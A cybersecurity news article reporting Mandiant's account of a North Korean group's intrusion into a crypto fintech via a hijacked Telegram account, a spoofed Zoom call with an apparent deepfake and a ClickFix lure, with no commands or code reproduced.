The cryptocurrency sector involves a lot of money and isn’t exactly secure. Unsurprisingly, North Korean hacking groups are eager to take advantage and steal as much as they can. Google’s Mandiant says it has discovered another intrusion targeting a fintech entity within the industry, attributed to UNC1069, a North Korean threat actor.
According to Mandiant, these groups continue to evolve their tradecraft to target the crypto and decentralized finance (DeFi) verticals. They arm themselves with new tooling and use AI-enabled social engineering, the researchers say.
This particular investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data.
“A highly determined effort”
“The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim,” Mandiant said in a blog post.
It looks like UNC1069, a financially motivated threat actor active since at least 2018, is further transitioning into a mature and dangerous attacker.
As early as November 2025, the Google Threat Intelligence Group said the attacker was not merely using AI for simple productivity gains but was deploying novel AI-enabled lures in active operations.
Now, “the volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft.”
Besides, while UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, it now also deploys multiple new malware families alongside the known downloader SUGARLOADER. It suggests a significant expansion of the attacker’s arsenal.
Hijack, engage, and attack
Mandiant offers a telling story. A victim of one attack was contacted via Telegram through the account of an executive of a cryptocurrency company that had been compromised by UNC1069.
The true owner of the compromised account had warned their contacts from another social media profile that their Telegram account had been hijacked, but the attack still occurred.
UNC1069 engaged the victim and, after building a rapport, sent a Calendly link to schedule a 30-minute meeting. The meeting link itself directed to a spoofed Zoom meeting that was hosted on the threat actor’s infrastructure.
The victim reported that during the call, they were presented with a video of a CEO from another cryptocurrency company that appeared to be a deepfake.
“While Mandiant was unable to recover forensic evidence to independently verify the use of AI models in this specific instance, the reported ruse is similar to a previously publicly reported incident with similar characteristics, where deepfakes were also allegedly used,” the researchers said.
Once in the “meeting,” the fake video call facilitated a ruse that gave the end user the impression they were experiencing audio issues.
This was employed by the threat actor to conduct a ClickFix attack – a technique in which the threat actor directs the user to run troubleshooting commands on their system to address a purported technical issue.
The recovered web page provided two sets of commands to be run for “troubleshooting,” one for macOS and one for Windows. Embedded within the string of commands was a single command that initiated the infection chain.
North Korea is stealing billions in crypto
According to Mandiant, UNC1069 is now regularly using these techniques to target corporate entities and individuals within the crypto industry. The threat actor seems to be using tools like Gemini to develop their own tooling, conduct research, and aid with reconnaissance.
“Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance targeting towards the Web3 industry, such as centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital funds,” said the researchers.
For this particular incident, Mandiant noted an unusually large amount of tooling dropped onto a single host targeting a single individual.
This evidence confirms that this incident was a targeted attack to harvest as much data as possible for dual purposes – enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging the victim’s identity and data.
North Koreans are indeed good at stealing crypto. In December, Chainalysis said that state-sponsored criminals from North Korea were responsible for $2 billion in losses of crypto assets in 2025.
TRM Labs additionally concludes that North Korea has “industrialized theft in the crypto market,” moving from opportunistic hacks to a smart supply chain: sourcing initial access from social engineering specialists, extracting funds via infrastructure attacks, and liquidating assets through a subcontracted network of Chinese shadow bankers.
Crypto is, of course, highly vulnerable to cyberattacks due to a combination of its decentralized, immutable nature, the rapid development of new technologies without sufficient security audits, and the high financial rewards for hackers.
Unlock more exclusive Cybernews content on YouTube.
Your email address will not be published. Required fields are markedmarked